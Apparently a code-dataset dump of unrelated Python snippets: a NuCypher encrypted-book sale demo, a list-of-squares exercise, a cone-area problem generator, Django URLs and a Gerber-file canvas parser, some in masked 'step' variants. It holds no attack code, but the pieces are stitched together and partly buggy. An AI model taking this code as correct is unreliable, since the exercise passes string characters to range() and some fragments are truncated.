self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nauthor = Author(b\"Author's ETH account\", Alice(network_middleware=\n RestMiddleware(), known_nodes=(URSULA,), federated_only=True,\n known_certificates_dir=CERTIFICATE_DIR))\nauthor.character.start_learning_loop(now=True)\nbook = Book(author)\nfirst_buyer = Buyer(b\"First Buyer's ETH account\", Bob(known_nodes=(URSULA,),\n federated_only=True, known_certificates_dir=CERTIFICATE_DIR))\nbook_store_delivery = BookStoreDelivery(book)\nbook_store_contract = BookStoreEthContract(book, author, 10,\n book_store_delivery.deliver_purchase)\n(author_public_key, policy_public_key, data_source_public_key, label, kit\n ) = first_buyer.send_eth_to(book_store_contract, 10)\nfirst_buyer.character.join_policy(label, bytes(author.character.stamp),\n node_list=[('localhost', 3601)])\ndatasource_as_understood_by_bob = DataSource.from_public_keys(policy_public_key\n =policy_public_key, datasource_public_key=data_source_public_key, label\n =label)\nalice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(\n author_public_key)\ndelivered_cleartexts = first_buyer.character.retrieve(message_kit=kit,\n data_source=datasource_as_understood_by_bob, alice_verifying_key=\n alice_pubkey_restored_from_ancient_scroll)\nprint(delivered_cleartexts)\n",
"step-5": "from eth_account.account import Account\nfrom nucypher.characters.lawful import Alice, Bob, Ursula\nfrom nucypher.network.middleware import RestMiddleware\nfrom nucypher.data_sources import DataSource\nfrom umbral.keys import UmbralPublicKey\nimport sys\nimport os\nimport binascii\nimport shutil\nimport maya\nimport datetime\n\nteacher_rest_port = 3501\nm = 2\nn = 3\nwith open(\"examples-runtime-cruft/node-metadata-{}\".format(teacher_rest_port), \"r\") as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\nURSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)\nprint(\"Will learn from {}\".format(URSULA))\nSHARED_CRUFTSPACE = \"{}/examples-runtime-cruft\".format(os.path.dirname(os.path.abspath(__file__)))\nCRUFTSPACE = \"{}/drm\".format(SHARED_CRUFTSPACE)\nCERTIFICATE_DIR = \"{}/certs\".format(CRUFTSPACE)\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\nclass ETHAccount(object):\n def send_eth_to(self, to, amount):\n return(to.fallback(self, amount))\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n def __init__(self, author):\n self.author = author\n self.content = b\"PlainText of the book\"\n self.label = b\"book\"\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print(\"Received %s ETH from %s\" % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return(self.purchase_event_hook(sender))\n\nclass BookStoreDelivery(object):\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.label, m=m, n=n,\n expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self.book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key, self.book.label, message_kit)\n\n\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nauthor = Author(b\"Author's ETH account\", Alice(network_middleware=RestMiddleware(),\n known_nodes=(URSULA,),\n federated_only=True,\n known_certificates_dir=CERTIFICATE_DIR,))\nauthor.character.start_learning_loop(now=True)\n\nbook = Book(author)\nfirst_buyer = Buyer(b\"First Buyer's ETH account\", Bob(known_nodes=(URSULA,),\n federated_only=True,\n known_certificates_dir=CERTIFICATE_DIR))\nbook_store_delivery = BookStoreDelivery(book)\nbook_store_contract = BookStoreEthContract(book, author, 10, book_store_delivery.deliver_purchase)\nauthor_public_key, policy_public_key, data_source_public_key, label, kit = first_buyer.send_eth_to(book_store_contract, 10)\nfirst_buyer.character.join_policy(label, # The label - he needs to know what data he's after.\n bytes(author.character.stamp), # To verify the signature, he'll need Alice's public key.\n # He can also bootstrap himself onto the network more quickly\n # by providing a list of known nodes at this time.\n node_list=[(\"localhost\", 3601)]\n )\ndatasource_as_understood_by_bob = DataSource.from_public_keys(\n policy_public_key=policy_public_key,\n datasource_public_key=data_source_public_key,\n label=label\n )\nalice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(author_public_key)\ndelivered_cleartexts = first_buyer.character.retrieve(message_kit=kit,\n data_source=datasource_as_understood_by_bob,\n alice_verifying_key=alice_pubkey_restored_from_ancient_scroll)\nprint(delivered_cleartexts)\n\n\n",
"step-ids": [
14,
19,
20,
22,
23
]
}
|
[
14,
19,
20,
22,
23
] |
"""
Question 39:
Define a function which can generate a list where the values are square of numbers between 1 and
20 (both included). Then the function needs to print the last 5 elements in the list.
"""
#To get a value from console input.
input_num = input("Write number:")
lis1=[]
lis2=[]
def lis(n1,n2):
"""
Generate and print last 5 element in list.
param:n1,n2
"""
i = 0
if n1 and n2 <= 20:
for x in range(n1,n2+1):
lis1.append(x*x)
lis1.reverse()
for y in lis1:
if i <=4:
lis2.append(y)
i +=1
print(lis2)
else:
print("Value out of range")
# Calling function.
lis(input_num[0],input_num[1])
|
normal
|
{
"blob_id": "24c1f5195bad17f995fb97a03218fc9bbe5ce4cd",
"index": 2476,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef lis(n1, n2):\n \"\"\"\n\tGenerate and print last 5 element in list.\n\tparam:n1,n2\n\t\"\"\"\n i = 0\n if n1 and n2 <= 20:\n for x in range(n1, n2 + 1):\n lis1.append(x * x)\n lis1.reverse()\n for y in lis1:\n if i <= 4:\n lis2.append(y)\n i += 1\n print(lis2)\n else:\n print('Value out of range')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef lis(n1, n2):\n \"\"\"\n\tGenerate and print last 5 element in list.\n\tparam:n1,n2\n\t\"\"\"\n i = 0\n if n1 and n2 <= 20:\n for x in range(n1, n2 + 1):\n lis1.append(x * x)\n lis1.reverse()\n for y in lis1:\n if i <= 4:\n lis2.append(y)\n i += 1\n print(lis2)\n else:\n print('Value out of range')\n\n\nlis(input_num[0], input_num[1])\n",
"step-4": "<mask token>\ninput_num = input('Write number:')\nlis1 = []\nlis2 = []\n\n\ndef lis(n1, n2):\n \"\"\"\n\tGenerate and print last 5 element in list.\n\tparam:n1,n2\n\t\"\"\"\n i = 0\n if n1 and n2 <= 20:\n for x in range(n1, n2 + 1):\n lis1.append(x * x)\n lis1.reverse()\n for y in lis1:\n if i <= 4:\n lis2.append(y)\n i += 1\n print(lis2)\n else:\n print('Value out of range')\n\n\nlis(input_num[0], input_num[1])\n",
"step-5": "\"\"\"\nQuestion 39:\nDefine a function which can generate a list where the values are square of numbers between 1 and\n20 (both included). Then the function needs to print the last 5 elements in the list.\n\"\"\"\n\n#To get a value from console input.\ninput_num = input(\"Write number:\")\nlis1=[]\nlis2=[]\n\ndef lis(n1,n2):\n\t\"\"\"\n\tGenerate and print last 5 element in list.\n\tparam:n1,n2\n\t\"\"\"\n\ti = 0\n\tif n1 and n2 <= 20:\n\t\tfor x in range(n1,n2+1):\n\t\t\tlis1.append(x*x)\n\t\tlis1.reverse()\n\t\t\n\t\tfor y in lis1:\n\t\t\tif i <=4:\n\t\t\t\tlis2.append(y)\n\t\t\t\ti +=1\n\t\tprint(lis2)\n\telse:\n\t\tprint(\"Value out of range\")\n\n# Calling function.\nlis(input_num[0],input_num[1])\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def assert_shapes(shape, other):
assert len(shape) == len(other), "Dimensions are different"
for s, o in zip(shape, other):
if s is not None and o is not None:
assert s == o, "Shapes {} and {} are not equal".format(shape, other)
|
normal
|
{
"blob_id": "337311c3fbb6a8baab7a237d08152f0db9822527",
"index": 2931,
"step-1": "<mask token>\n",
"step-2": "def assert_shapes(shape, other):\n assert len(shape) == len(other), 'Dimensions are different'\n for s, o in zip(shape, other):\n if s is not None and o is not None:\n assert s == o, 'Shapes {} and {} are not equal'.format(shape, other\n )\n",
"step-3": "\ndef assert_shapes(shape, other):\n assert len(shape) == len(other), \"Dimensions are different\"\n for s, o in zip(shape, other):\n if s is not None and o is not None:\n assert s == o, \"Shapes {} and {} are not equal\".format(shape, other)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from .__init__ import *
def surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):
a = random.randint(1, maxHeight)
b = random.randint(1, maxRadius)
slopingHeight = math.sqrt(a**2 + b**2)
problem = f"Surface area of cone with height = {a}{unit} and radius = {b}{unit} is"
ans = int(math.pi * b * slopingHeight + math.pi * b * b)
solution = f"{ans} {unit}^2"
return problem, solution
surface_area_cone = Generator(
"Surface Area of cone", 38,
"Surface area of cone with height = a units and radius = b units is",
"c units^2", surfaceAreaCone)
|
normal
|
{
"blob_id": "3e19ede2112a109a776b607e927e2f0a095ba5cc",
"index": 7677,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):\n a = random.randint(1, maxHeight)\n b = random.randint(1, maxRadius)\n slopingHeight = math.sqrt(a ** 2 + b ** 2)\n problem = (\n f'Surface area of cone with height = {a}{unit} and radius = {b}{unit} is'\n )\n ans = int(math.pi * b * slopingHeight + math.pi * b * b)\n solution = f'{ans} {unit}^2'\n return problem, solution\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):\n a = random.randint(1, maxHeight)\n b = random.randint(1, maxRadius)\n slopingHeight = math.sqrt(a ** 2 + b ** 2)\n problem = (\n f'Surface area of cone with height = {a}{unit} and radius = {b}{unit} is'\n )\n ans = int(math.pi * b * slopingHeight + math.pi * b * b)\n solution = f'{ans} {unit}^2'\n return problem, solution\n\n\nsurface_area_cone = Generator('Surface Area of cone', 38,\n 'Surface area of cone with height = a units and radius = b units is',\n 'c units^2', surfaceAreaCone)\n",
"step-4": "from .__init__ import *\n\n\ndef surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):\n a = random.randint(1, maxHeight)\n b = random.randint(1, maxRadius)\n slopingHeight = math.sqrt(a ** 2 + b ** 2)\n problem = (\n f'Surface area of cone with height = {a}{unit} and radius = {b}{unit} is'\n )\n ans = int(math.pi * b * slopingHeight + math.pi * b * b)\n solution = f'{ans} {unit}^2'\n return problem, solution\n\n\nsurface_area_cone = Generator('Surface Area of cone', 38,\n 'Surface area of cone with height = a units and radius = b units is',\n 'c units^2', surfaceAreaCone)\n",
"step-5": "from .__init__ import *\n\n\ndef surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):\n a = random.randint(1, maxHeight)\n b = random.randint(1, maxRadius)\n\n slopingHeight = math.sqrt(a**2 + b**2)\n problem = f\"Surface area of cone with height = {a}{unit} and radius = {b}{unit} is\"\n ans = int(math.pi * b * slopingHeight + math.pi * b * b)\n\n solution = f\"{ans} {unit}^2\"\n return problem, solution\n\n\nsurface_area_cone = Generator(\n \"Surface Area of cone\", 38,\n \"Surface area of cone with height = a units and radius = b units is\",\n \"c units^2\", surfaceAreaCone)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from . import views
from django.conf.urls import url,re_path
enquiryUrlPattern = [
url(r'daily-rate-enquiry', views.daily_rate_enquiry_form),
re_path(r'^contact-us-landing-page/$', views.contact_us_landing_page),
]
|
normal
|
{
"blob_id": "ccf1710cff972eaa06e1ccb5ebedc70d946e3215",
"index": 4906,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nenquiryUrlPattern = [url('daily-rate-enquiry', views.\n daily_rate_enquiry_form), re_path('^contact-us-landing-page/$', views.\n contact_us_landing_page)]\n",
"step-3": "from . import views\nfrom django.conf.urls import url, re_path\nenquiryUrlPattern = [url('daily-rate-enquiry', views.\n daily_rate_enquiry_form), re_path('^contact-us-landing-page/$', views.\n contact_us_landing_page)]\n",
"step-4": "from . import views\nfrom django.conf.urls import url,re_path\n\nenquiryUrlPattern = [\n url(r'daily-rate-enquiry', views.daily_rate_enquiry_form),\n re_path(r'^contact-us-landing-page/$', views.contact_us_landing_page),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class GerberCanvas:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, frame):
self.x_format = ''
self.y_format = ''
self.units = ''
self.quadrant_mode = 0
self.file_commands = ''
self.file_gtp_commands = ''
self.gerber_file_name = ''
self.AD_commands = {}
self.current_aperture = ''
self.x = '0'
self.y = '0'
self.i = '0'
self.j = '0'
self.last_x = ''
self.last_y = ''
self.start_x = ''
self.start_y = ''
self.direction = 0
self.graphics_mode = 0
self.scaled = False
self.bounding_box_size = ()
self._canvas_frame = frame
self.create_canvas()
def create_canvas(self):
self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')
self.my_canvas.pack(expand=True, fill='both')
if sys.platform == 'linux':
self.my_canvas.bind('<Button-4>', self.__scale_image_up)
self.my_canvas.bind('<Button-5>', self.__scale_image_down)
else:
self.my_canvas.bind('<MouseWheel>', self.__scale_image)
self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.
my_canvas.yview)
self.y_scrollbar.pack(expand=True, fill='y', anchor='e')
self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.
HORIZONTAL, command=self.my_canvas.xview)
self.x_scrollbar.pack(fill='x', anchor='s')
if sys.platform == 'linux':
self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,
yscrollcommand=self.y_scrollbar.set)
self.__part_selected = 0
<|reserved_special_token_0|>
def load_gerber_gtp(self, file_path):
self.file_gtp = True
try:
print(file_path)
new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'
print('final name =', new_file)
if file_path:
try:
with open(new_file, 'r') as gerber_file:
self.file_gtp_commands = gerber_file.read().splitlines(
)
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_gtp_commands)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTP')
def __parse_file(self, commands):
if DEBUG:
print(self.file_commands)
temp_list = commands
for item in temp_list:
if DEBUG:
print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
GerberCanvas.units = 0
if 'MM' in item:
GerberCanvas.units = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
if DEBUG:
print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
if DEBUG:
print(value)
self.AD_commands[name] = value
if item[0:1] == 'D':
item = item[0:item.find('*')]
if DEBUG:
print('I found a ', item)
for key, value in self.AD_commands.items():
self.current_ad_command = key
if item in key:
if 'R,' in value:
print(value)
x, y = self.__get_rectangle_size(value)
self.rect_x = x
self.rect_y = y
print('Half of x is: ', float(self.rect_x) / 2)
elif 'C,' in value:
print(value)
self.current_aperture = self.__get_circle_diameter(
value)
elif 'O,' in value:
pass
elif 'P,' in value:
pass
elif 'TARGET' in value:
pass
elif 'THERMAL' in value:
pass
if 'D03' in item:
if DEBUG:
print('current key is = ', self.current_ad_command)
print(self.AD_commands[self.current_ad_command])
if 'R,' in self.AD_commands[self.current_ad_command]:
if DEBUG:
print('draw a rectangle')
x0 = float(self.start_x) - float(self.rect_x) / 2
y0 = float(self.start_y) + float(self.rect_y) / 2
x1 = float(self.start_x) + float(self.rect_x) / 2
y1 = float(self.start_y) - float(self.rect_y) / 2
self.my_canvas.create_rectangle(str(x0) + GerberCanvas.
units_string[GerberCanvas.units], str(y0) +
GerberCanvas.units_string[GerberCanvas.units], str(
x1) + GerberCanvas.units_string[GerberCanvas.units],
str(y1) + GerberCanvas.units_string[GerberCanvas.
units], outline='white', fill='black')
if 'C,' in self.AD_commands[self.current_ad_command]:
print('draw a circle')
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
if self.file_gto:
self.__get_numbers(item)
if DEBUG:
print(self.start_x, ',', self.start_y, ',', self.x,
',', self.y)
self.my_canvas.create_line(self.start_x + 'i', self.
start_y + 'i', self.x + 'i', self.y + 'i', width=
self.current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
if self.file_gto:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
try:
self.my_canvas.create_oval(str(cp_x -
radius) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], outline='black', width=self.
current_aperture)
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
break
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if DEBUG:
print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
else:
radius = 0.0
self.__set_direction()
start_angle = math.degrees(math.atan2(float(
self.start_y) - cp_y, float(self.start_x) -
cp_x))
end_angle = math.degrees(math.atan2(float(self.
y) - cp_y, float(self.x) - cp_x))
try:
self.my_canvas.create_arc(str(cp_x + radius
) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], style=tk.ARC, width=self.
current_aperture, start=start_angle,
extent=end_angle - start_angle, outline
='black')
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
@staticmethod
def __get_circle_diameter(value):
return value[3:len(value)]
@staticmethod
def __get_rectangle_size(value):
print(value)
find_x = value.find('X'[0:len(value)])
width = value[2:find_x]
length = value[find_x + 1:len(value)]
print(width, length)
return width, length
def __get_extent(self, radius):
distance = self.__distance(float(self.start_x), float(self.start_y),
float(self.x), float(self.y))
if DEBUG:
print('distance = ', distance)
number = 1 - distance ** 2 / (2 * radius ** 2)
result = number - int(number)
return math.acos(result)
@staticmethod
def __distance(start_x, start_y, end_x, end_y):
"""calculate distance between two points
:param start_x
:param start_y
:param end_x
:param end_y
"""
distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)
return distance
def __set_direction(self):
if self.x == self.start_x:
if self.y < self.start_y:
self.direction = 90
else:
self.direction = 270
if self.y == self.start_y:
if self.x < self.start_x:
self.direction = 0
else:
self.direction = 180
def __get_numbers(self, item):
found = 0
if 'I' in item and 'J' in item and found == 0:
found = 1
i_start = item.find('I')
j_start = item.find('J')
d_start = item.find('D')
i_temp = item[i_start + 1:j_start]
j_temp = item[j_start + 1:d_start]
j_temp = str(int(j_temp) * -1)
self.i = self.__format_number(i_temp)
self.j = self.__format_number(j_temp)
if 'X' and 'Y' in item:
found = 0
if 'X' in item and 'Y' in item and found == 0:
found = 1
x_start = item.find('X')
y_start = item.find('Y')
d_start = item.find('D')
x_temp = item[x_start + 1:y_start]
y_temp = item[y_start + 1:d_start]
if ('I' or 'J') in y_temp:
for i in range(1, len(y_temp)):
if y_temp[i] == 'I':
y_temp = y_temp[0:i]
break
y_temp = str(int(y_temp) * -1)
self.x = self.__format_number(x_temp)
self.y = self.__format_number(y_temp)
if 'X' in item and found == 0:
found = 1
x_start = item.find('X')
d_start = item.find('D')
x_temp = item[x_start + 1:d_start]
self.x = self.__format_number(x_temp)
if 'Y' in item and found == 0:
found = 1
y_start = item.find('Y')
d_start = item.find('D')
y_temp = item[y_start + 1:d_start]
y_temp = str(int(y_temp) * -1)
self.y = self.__format_number(y_temp)
def __format_number(self, number):
how_long = len(number)
if how_long <= int(self.x_format[1]):
if '-' in number:
temp = number[1:len(number)]
return '-.' + temp.zfill(int(self.x_format[1]))
else:
return '.' + number.zfill(int(self.x_format[1]))
elif how_long > int(self.x_format[1]):
last = number[-5:len(number)]
first = number[0:len(number) - 5]
if '-' in number:
return first + '.' + last
else:
return first + '.' + last
<|reserved_special_token_0|>
def delete_current_highlight(self):
if self.__part_selected:
self.my_canvas.delete(self.__part_selected)
def __scale_image_up(self, event=None):
self.scale_factor = 1
self.scale_factor += 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image_down(self, event=None):
self.scale_factor = 1
self.scale_factor -= 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
if PickPlace.is_file_loaded:
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image(self, event=None):
if event.delta >= 120:
self.__scale_image_up()
elif event.delta <= -120:
self.__scale_image_down()
self.scaled = True
@staticmethod
def __format_pnp(number):
move1 = float(number) / 10
move2 = move1 / 10
final = move2 / 10
return final
def __parse_file_gtp(self):
temp_list = self.file_commands
for item in temp_list:
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
self.__inch = 1
self.__mm = 0
if 'MM' in item:
self.__inch = 0
self.__mm = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
self.AD_commands[name] = value[2:len(value)]
if item[0:1] == 'D':
item = item[0:item.find('*')]
for key, value in self.AD_commands.items():
if item in key:
self.current_aperture = value
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
self.__get_numbers(item)
self.my_canvas.create_line(self.start_x + 'i', self.start_y +
'i', self.x + 'i', self.y + 'i', width=self.
current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
self.my_canvas.create_oval(str(cp_x - radius) + 'i',
str(cp_y - radius) + 'i', str(cp_x + radius) +
'i', str(cp_y + radius) + 'i', outline='black',
width=self.current_aperture)
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
self.__set_direction()
start_angle = math.degrees(math.atan2(float(self.
start_y) - cp_y, float(self.start_x) - cp_x))
end_angle = math.degrees(math.atan2(float(self.y) -
cp_y, float(self.x) - cp_x))
ext = math.degrees(self.__get_extent(radius))
self.my_canvas.create_arc(str(cp_x + radius) + 'i',
str(cp_y + radius) + 'i', str(cp_x - radius) +
'i', str(cp_y - radius) + 'i', style=tk.ARC,
width=self.current_aperture, start=start_angle,
extent=end_angle - start_angle, outline='black')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GerberCanvas:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, frame):
self.x_format = ''
self.y_format = ''
self.units = ''
self.quadrant_mode = 0
self.file_commands = ''
self.file_gtp_commands = ''
self.gerber_file_name = ''
self.AD_commands = {}
self.current_aperture = ''
self.x = '0'
self.y = '0'
self.i = '0'
self.j = '0'
self.last_x = ''
self.last_y = ''
self.start_x = ''
self.start_y = ''
self.direction = 0
self.graphics_mode = 0
self.scaled = False
self.bounding_box_size = ()
self._canvas_frame = frame
self.create_canvas()
def create_canvas(self):
self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')
self.my_canvas.pack(expand=True, fill='both')
if sys.platform == 'linux':
self.my_canvas.bind('<Button-4>', self.__scale_image_up)
self.my_canvas.bind('<Button-5>', self.__scale_image_down)
else:
self.my_canvas.bind('<MouseWheel>', self.__scale_image)
self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.
my_canvas.yview)
self.y_scrollbar.pack(expand=True, fill='y', anchor='e')
self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.
HORIZONTAL, command=self.my_canvas.xview)
self.x_scrollbar.pack(fill='x', anchor='s')
if sys.platform == 'linux':
self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,
yscrollcommand=self.y_scrollbar.set)
self.__part_selected = 0
<|reserved_special_token_0|>
def load_gerber_gtp(self, file_path):
self.file_gtp = True
try:
print(file_path)
new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'
print('final name =', new_file)
if file_path:
try:
with open(new_file, 'r') as gerber_file:
self.file_gtp_commands = gerber_file.read().splitlines(
)
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_gtp_commands)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTP')
def __parse_file(self, commands):
if DEBUG:
print(self.file_commands)
temp_list = commands
for item in temp_list:
if DEBUG:
print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
GerberCanvas.units = 0
if 'MM' in item:
GerberCanvas.units = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
if DEBUG:
print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
if DEBUG:
print(value)
self.AD_commands[name] = value
if item[0:1] == 'D':
item = item[0:item.find('*')]
if DEBUG:
print('I found a ', item)
for key, value in self.AD_commands.items():
self.current_ad_command = key
if item in key:
if 'R,' in value:
print(value)
x, y = self.__get_rectangle_size(value)
self.rect_x = x
self.rect_y = y
print('Half of x is: ', float(self.rect_x) / 2)
elif 'C,' in value:
print(value)
self.current_aperture = self.__get_circle_diameter(
value)
elif 'O,' in value:
pass
elif 'P,' in value:
pass
elif 'TARGET' in value:
pass
elif 'THERMAL' in value:
pass
if 'D03' in item:
if DEBUG:
print('current key is = ', self.current_ad_command)
print(self.AD_commands[self.current_ad_command])
if 'R,' in self.AD_commands[self.current_ad_command]:
if DEBUG:
print('draw a rectangle')
x0 = float(self.start_x) - float(self.rect_x) / 2
y0 = float(self.start_y) + float(self.rect_y) / 2
x1 = float(self.start_x) + float(self.rect_x) / 2
y1 = float(self.start_y) - float(self.rect_y) / 2
self.my_canvas.create_rectangle(str(x0) + GerberCanvas.
units_string[GerberCanvas.units], str(y0) +
GerberCanvas.units_string[GerberCanvas.units], str(
x1) + GerberCanvas.units_string[GerberCanvas.units],
str(y1) + GerberCanvas.units_string[GerberCanvas.
units], outline='white', fill='black')
if 'C,' in self.AD_commands[self.current_ad_command]:
print('draw a circle')
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
if self.file_gto:
self.__get_numbers(item)
if DEBUG:
print(self.start_x, ',', self.start_y, ',', self.x,
